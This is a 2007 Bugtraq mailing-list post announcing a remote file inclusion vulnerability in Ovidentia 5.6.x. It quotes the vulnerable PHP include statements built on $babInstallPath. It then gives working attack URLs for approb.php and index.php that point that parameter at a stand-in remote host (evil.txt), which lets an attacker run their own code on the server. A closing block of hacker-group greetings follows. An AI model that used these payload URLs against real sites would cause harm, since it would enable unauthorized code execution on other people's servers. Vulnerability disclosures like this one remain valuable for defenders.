[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20070114151910.32199.qmail@securityfocus.com>
Date: 14 Jan 2007 15:19:10 -0000
From: hotturk@...et.com
To: bugtraq@...urityfocus.com
Subject: Ovidentia 5.6x Series Remote File İnclude
<!--- Product : Ovidentia 5.6.x
- Website : http://ovidentia.org
- Author : H0tTurk-WebSiteVersion:1.x - Problem : Remote File-->
include_once $babInstallPath."utilit/mailincl.php";include_once $babInstallPath."utilit/afincl.php";
include_once $babInstallPath."utilit/topincl.php";
include_once $babInstallPath."utilit/artincl.php";include_once $babInstallPath."utilit/vacincl.php";
include_once $babInstallPath."utilit/evtincl.php";
include_once $babInstallPath."utilit/calincl.php";---)
www.victim.com/path/approb.php
?babInstallPath=http://evil.txt?
www.victim.com/path/index.php?babInstallPath=http://evil.txt
?
--------------------------------------------------------
Thx:DrMaxVirus,ajann,GencTurk,uykusuz001,Enjexion,PSYCH@,Arabian-FighterZ,Mefisto,SawTurk,Madconfig,SeanPaul
TiT,Salih,HM,Ayyildiz TiMUsers,OzelHarekat/Security
" BUNDAN OTESi Ya IstiKLaL Ya OLUM
Powered by blists - more mailing lists